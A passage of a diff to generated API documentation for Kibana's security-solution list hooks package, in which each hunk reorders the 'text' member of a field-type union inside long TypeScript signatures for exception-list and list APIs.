\"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -186,7 +186,7 @@ "The exceptionItem to transform the output of" ], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | 
\"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" 
| \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: 
\"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -317,7 +317,7 @@ "OptionalSignalArgs", "<", "DeleteListParams", - ">], { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ">], { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_delete_list/index.ts", "deprecated": false, 
@@ -445,7 +445,7 @@ "OptionalSignalArgs", "<", "FindListsParams", - ">], { cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" + ">], { cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_find_lists/index.ts", "deprecated": false, 
@@ -467,7 +467,7 @@ "OptionalSignalArgs", "<", "ImportListParams", - ">], { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ">], { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_import_list/index.ts", "deprecated": false, 
@@ -623,7 +623,7 @@ "label": "addExceptionListItem", "description": [], "signature": [ - "(arg: { listItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }; }) => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: 
\"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + "(arg: { listItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | 
{ field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }; }) => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: 
string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false, 
@@ -646,7 +646,7 @@ "label": "listItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | 
\"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false 
@@ -664,7 +664,7 @@ "label": "updateExceptionListItem", "description": [], "signature": [ - "(arg: { listItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }; }) => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; 
value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + "(arg: { listItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; 
operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }; }) => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | 
\"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false, 
@@ -687,7 +687,7 @@ "label": "listItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | 
\"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false 
@@ -771,7 +771,7 @@ "signature": [ "(arg: ", "ApiCallMemoProps", - " & { onSuccess: (arg: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => void; }) => Promise" + " & { onSuccess: (arg: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; 
